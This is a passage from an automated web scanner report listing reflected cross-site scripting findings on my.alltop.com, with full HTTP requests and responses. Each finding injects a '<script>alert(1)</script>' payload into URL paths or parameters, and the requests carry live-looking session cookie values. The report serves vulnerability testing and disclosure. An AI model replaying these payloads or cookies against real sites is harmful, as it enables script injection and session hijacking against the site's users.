Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:49:53 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24546

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/abe629"><script>alert(1)</script>f2ad206645/%22ns=%22netsparker(0x00011B)" method="post" accept-charset="utf-8">
...[SNIP]...

1.37. http://my.alltop.com/alpha/a/%22ns=%22netsparker(0x00011B) [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/a/%22ns=%22netsparker(0x00011B)

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86b93"><script>alert(1)</script>b2cb0933293 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/a/%22ns86b93"><script>alert(1)</script>b2cb0933293=%22netsparker(0x00011B) HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:57 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:57 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:57 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:49:57 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/a/%22ns86b93"><script>alert(1)</script>b2cb0933293=%22netsparker(0x00011B)" method="post" accept-charset="utf-8">
...[SNIP]...

1.38. http://my.alltop.com/alpha/a/%22ns=%22netsparker(0x00011B) [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/a/%22ns=%22netsparker(0x00011B)

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38877"><script>alert(1)</script>a320b4a355e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/a/%22ns=%22netsparker(0x00011B)?38877"><script>alert(1)</script>a320b4a355e=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:48 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:48 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:49 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:49:49 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24562

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/a/%22ns=%22netsparker(0x00011B)?38877"><script>alert(1)</script>a320b4a355e=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.39. http://my.alltop.com/alpha/a/%2522ns%253D%2522netsparker%25280x000127%2529) [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/a/%2522ns%253D%2522netsparker%25280x000127%2529)

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65e90"><script>alert(1)</script>b0cec35769d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/a65e90"><script>alert(1)</script>b0cec35769d/%2522ns%253D%2522netsparker%25280x000127%2529) HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:50 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:50 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:51 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:49:51 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24618

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/a65e90"><script>alert(1)</script>b0cec35769d/%2522ns%253D%2522netsparker%25280x000127%2529)" method="post" accept-charset="utf-8">
...[SNIP]...

1.40. http://my.alltop.com/alpha/a/%2522ns%253D%2522netsparker%25280x000127%2529) [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/a/%2522ns%253D%2522netsparker%25280x000127%2529)

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76708"><script>alert(1)</script>90f73ef6e41 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/a/%2522ns%253D%2522netsparker%25280x000127%2529)76708"><script>alert(1)</script>90f73ef6e41 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:51 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:51 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:53 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:49:53 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24618

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/a/%2522ns%253D%2522netsparker%25280x000127%2529)76708"><script>alert(1)</script>90f73ef6e41" method="post" accept-charset="utf-8">
...[SNIP]...

1.41. http://my.alltop.com/alpha/a/%2522ns%253D%2522netsparker%25280x000127%2529) [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/a/%2522ns%253D%2522netsparker%25280x000127%2529)

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c37ee"><script>alert(1)</script>716a484ee8e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/a/%2522ns%253D%2522netsparker%25280x000127%2529)?c37ee"><script>alert(1)</script>716a484ee8e=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:46 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:46 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:47 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:49:47 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24630

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/a/%2522ns%253D%2522netsparker%25280x000127%2529)?c37ee"><script>alert(1)</script>716a484ee8e=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.42. http://my.alltop.com/alpha/b ['"--> parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/b

Issue detail

The value of the '"--></style></script><script>netsparker(0x00017A)</script> request parameter is copied into the HTML document as plain text between tags. The payload 18e8f<script>alert(1)</script>0a0bffe1674 was submitted in the '"--></style></script><script>netsparker(0x00017A)</script> parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/b?'"--></style></script><script>netsparker(0x00017A)</script>18e8f<script>alert(1)</script>0a0bffe1674 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:22 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:22 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:23 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:23 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24662

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
</script>18e8f<script>alert(1)</script>0a0bffe1674" method="post" accept-charset="utf-8">
...[SNIP]...

1.43. http://my.alltop.com/alpha/b [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/b

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6223d"><script>alert(1)</script>84589b18223 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/b6223d"><script>alert(1)</script>84589b18223 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:46 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:46 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:47 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:47 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/b6223d"><script>alert(1)</script>84589b18223" method="post" accept-charset="utf-8">
...[SNIP]...

1.44. http://my.alltop.com/alpha/b [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/b

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7c33"><script>alert(1)</script>599ca4a5324 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/b?f7c33"><script>alert(1)</script>599ca4a5324=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:41 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:41 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:44 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:44 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24442

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/b?f7c33"><script>alert(1)</script>599ca4a5324=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.45. http://my.alltop.com/alpha/b [nsextt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/b

Issue detail

The value of the nsextt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33c92"><script>alert(1)</script>c39e161a26a was submitted in the nsextt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/b?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000E9)%3C/script%3E33c92"><script>alert(1)</script>c39e161a26a HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:46 GMT
Server: Apache/2.2.3 (Red Hat)
